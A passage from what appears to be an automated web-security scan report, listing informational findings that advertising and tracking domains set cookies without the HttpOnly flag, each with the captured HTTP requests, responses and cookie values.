Mwt9pDo4G3TjkMSE2urA6RQdUAWYeoJQpCu6kLg-kmXa4JYXwL5SDjce5WjiPia_4luRal1kY0Ua2L50HxvswuEv77HCRTvK41JwlocRM-1StCCQK60MTBqLSIeNNGU_XCDdEOyfgVlVS8ISxl2FC-QxoYM1dFQrVqtvVzrvJEYFzSRak7dnImakJ6Zxx4MaHG4qowJX52fHOfatzSZzKUl8ueBqzCaawyxPIuWXsEQ-0VWpUhNmBZ-iEOjj626Xr9a4PyPR4yPdkp0kF32F0VrZ-eD50kGIwYPBSo2jlvAF8lq_IygKlXvQQfU6ZavOfoVVJhgWQDUVQfWr6jEufoVuLrgwy8D2rDDCOXkqJdp6fs-m5LFp079CPUiQuMHA6LAYXd57kxI-94h_yPZdjrrVWBfP28qvnT-zGB9Xm2VMe1fLfEIlOjW7jR21XdBj9GT7hPGQI4m-OZy0i_pb_ZtNk1d5ZJuHZA0jg1fLTpYL91q-pX0OtP78DoTX-MltELREBCeeahn1EC3U97yx8tXGz59qajUNpeot5-RPYUMY1qY3KivegYnicFnxFc-4ikme6wD3XHzXEqzQphnl7VhTGqxMDJsQpCu6kLg-kmXa4JYXwL5SDsgJkFWfRpPSyTdtKER-3fcbnCbJPSsHs0iOvX6zYZZ4XS3R0VP0f9ONcHVGJG5kfjUcKVDPX7zKRho6DeqmotVVS8ISxl2FC-QxoYM1dFQrENIylttcubl60fIAlgS379WGImt49pAB5RbCmhGeBVeEsNCVznntZWR3U7tjmpSZiMw4PMfLrYvwIJbxWoTsNZ-iEOjj626Xr9a4PyPR4yMyn697UAeI_iQ8xLHPyiNAwYPBSo2jlvAF8lq_IygKld75wEvezzIZgflpDl6XV7Bz61fwo7QtwGhL9V1Zrp3FrDDCOXkqJdp6fs-m5LFp0xYfxbijCuZYBnVL9kRyFz4-94h_yPZdjrrVWBfP28qvmOFU8nguKqpFLBdwoMdYmADyq9uBrjiMx6VvlWwNe_j33zBfQgc7CEV5jgCDdYtxgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA1ZO48tyrM-ITAlagqmc0qyWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyISYAbn3vt4ljb5jrj3mjbuV6ONoHWtyiE_pNTuBZXnxgi4LrnYI2YdVGKStQre4vEIuC652CNmHVRikrUK3uLxAmtS2Fa_lgnITmIRLj_AJR7yJIda-hMcXPq0_ADWUTce8iSHWvoTHFz6tPwA1lE3HvIkh1r6Exxc-rT8ANZRNz1jBTPQnGgalvM6qx6aEDqwMBGNyQcik-CF3_ES7LaN4Qoi_pxuEDAGD0pSAe0ShbJ44Ix0PS_yRZLx_j2HJpKyeOCMdD0v8kWS8f49hyaSko9jTov_tduoJ79WLRX3x8Jj6CPb9QD2jcY4QbTolZhp6t2QqCDEnVfKSI9Czqb8VkfhIMtBluaWa_TlPV12CVZH4SDLQZbmlmv05T1ddglWR-Egy0GW5pZr9OU9XXYJVkfhIMtBluaWa_TlPV12CZekQLzj8BqHl0xQJeRVWsdCB_o2VuswdXqYMMGNHfG3Qgf6NlbrMHV6mDDBjR3xt0IH-jZW6zB1epgwwY0d8bdCB_o2VuswdXqYMMGNHfG3UUrgidBzdBjh8B5MmfBQqlFK4InQc3QY4fAeTJnwUKpRSuCJ0HN0GOHwHkyZ8FCqWvltIzMqv1Ia8A8-3JcNhcYY5Ax3y_aeD6ynSPnIOKXGGOQMd8v2ng-sp0j5yDilxhjkDHfL9p4PrKdI-cg4pas0VdShRmcr603-icVYa2s; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
fc=4eSwQ3g1tAr0ps2Jsn-_eWoVwDvXeel54vyZXm8QLISGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOemGrp6DlmlaGmQt2qcOx1gg; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
pf=xRx_CDsAoWoco5w3DRjwyiu1jndAIQSkfSH7IRm-hA2JwV9kSIzX4BtZ7vBDkFqiIdgy2Lx6nc2yvIrh5BEVs34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.214. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 14:48:47 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 14:48:47 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 14:48:47 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=4510090875291133304&fpid=6&nu=n&t=
...[SNIP]...

11.215. http://ads.roiserver.com/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.roiserver.com
Path:	/click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sadscpax=e5656a6-; Domain=ads.roiserver.com; Expires=Sat, 29-Jan-2011 17:08:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click?clid=e5656a6&rand=1296224076876&sid= HTTP/1.1
Host: ads.roiserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.216. http://adsfac.us/ag.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FSQAN007310005=uid=14877790; expires=Sat, 29-Jan-2011 23:45:08 GMT; path=/
FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1; expires=Mon, 28-Feb-2011 23:45:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ag.asp?cc=QAN007.310005.0&source=js&ord=5596043 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 1042
Content-Type: text/javascript
Expires: Fri, 28 Jan 2011 23:44:09 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSQAN007310005=uid=14877790; expires=Sat, 29-Jan-2011 23:45:08 GMT; path=/
Set-Cookie: FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1; expires=Mon, 28-Feb-2011 23:45:08 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Fri, 28 Jan 2011 23:45:09 GMT
Connection: close

if (typeof(fd_clk)=='undefined'){var fd_clk = 'http://ADSFAC.US/link.asp?cc=QAN007.310005.0&CreativeID=30281';}if(fd_clk.toLowerCase().indexOf('&creativeid=')!=-1){}else{fd_clk += '&CreativeID=30281'}
...[SNIP]...

11.217. http://adsfac.us/link.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adsfac.us
Path:	/link.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

FSQAN007=pctl=310005&FM30281=1&pdc=4045&pctc=30281&FQ=1&pctcrt=1&pctm=1&FL310005=1&fpt=0%2C310005%2C&pct%5Fdate=4045; expires=Tue, 01-Mar-2011 05:20:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link.asp?cc=QAN007.310005.0&CreativeID=30281 HTTP/1.1
Host: adsfac.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: FSQAN007310005=uid=14877790; FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 276
Content-Type: text/html
Expires: Sat, 29 Jan 2011 05:19:26 GMT
Location: http://www.qantasvacations.com/sydney/?utm_campaign=SpectacularSydney&utm_medium=listing&utm_source=QFOnineAds&utm_content=&utm_term=sydney
Server: Microsoft-IIS/7.0
Set-Cookie: FSQAN007=pctl=310005&FM30281=1&pdc=4045&pctc=30281&FQ=1&pctcrt=1&pctm=1&FL310005=1&fpt=0%2C310005%2C&pct%5Fdate=4045; expires=Tue, 01-Mar-2011 05:20:26 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 29 Jan 2011 05:20:26 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.qantasvacations.com/sydney/?utm_campaign=SpectacularSydney&utm_medium=listing&u
...[SNIP]...

11.218. http://adsfac.us/link.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adsfac.us
Path:	/link.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

FS=fpt=0%2C0%2C&pctcrt=1&pctm=1&pctl=0&FM1=1&pdc=4045&pctc=1&FL0=1&FQ=1; expires=Tue, 01-Mar-2011 05:20:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link.asp HTTP/1.1
Host: adsfac.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: FSQAN007310005=uid=14877790; FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 152
Content-Type: text/html
Expires: Sat, 29 Jan 2011 05:19:26 GMT
Location: http://www.facilitatedigital.us
Server: Microsoft-IIS/7.0
Set-Cookie: FS=fpt=0%2C0%2C&pctcrt=1&pctm=1&pctl=0&FM1=1&pdc=4045&pctc=1&FL0=1&FQ=1; expires=Tue, 01-Mar-2011 05:20:26 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 29 Jan 2011 05:20:26 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.facilitatedigital.us">here</a>.</body>

11.219. http://amch.questionmarket.com/adsc/d791689/21/39823749/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d791689/21/39823749/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Thu, 28 Jan 2010 14:48:40 GMT; path=/; domain=.questionmarket.com
CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; expires=Tue, 20 Mar 2012 06:48:41 GMT; path=/; domain=.questionmarket.com
ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; expires=Tue, 20-Mar-2012 06:48:41 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.220. http://ar.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=55564d24-301b-478f-82b3-5dcbbd104f3e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:43 GMT; path=/
iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.221. http://ar.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=89db16b4-a732-4dce-8ce2-a6fc021fefde&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:45 GMT; path=/
iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
par=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:16:45 GMT; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=yzncppn3i5kxmq55usvxbp45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=yzncppn3i5kxmq55usvxbp45; path=/; HttpOnly
Set-Cookie: spvdr=vd=89db16b4-a732-4dce-8ce2-a6fc021fefde&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:45 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: par=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:16:45 GMT; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:44 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

11.222. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.223. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; expires=Fri 29-Apr-2011 01:32:02 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.224. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; expires=Thu 28-Apr-2011 14:14:48 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1296224088; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.225. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; expires=Thu 28-Apr-2011 22:52:05 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.226. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://au.track.decideinteractive.com
Path:	/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=9272912264837465719; expires=Sat, 28-Jan-2012 14:12:05 GMT; path=/; domain=.decideinteractive.com;
name=9272912264820689035; path=/; domain=.decideinteractive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.227. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 14:14:32 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.228. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 15:00:13 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.229. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 515
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="ATTWL=CollectiveB3;expires="+B3d.toGMTString()+";pa
...[SNIP]...

11.230. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]/2045287019/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SRC="
...[SNIP]...

11.231. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90?http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543^950189^81^0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

11.232. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

11.233. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90?http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541^950190^81^0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
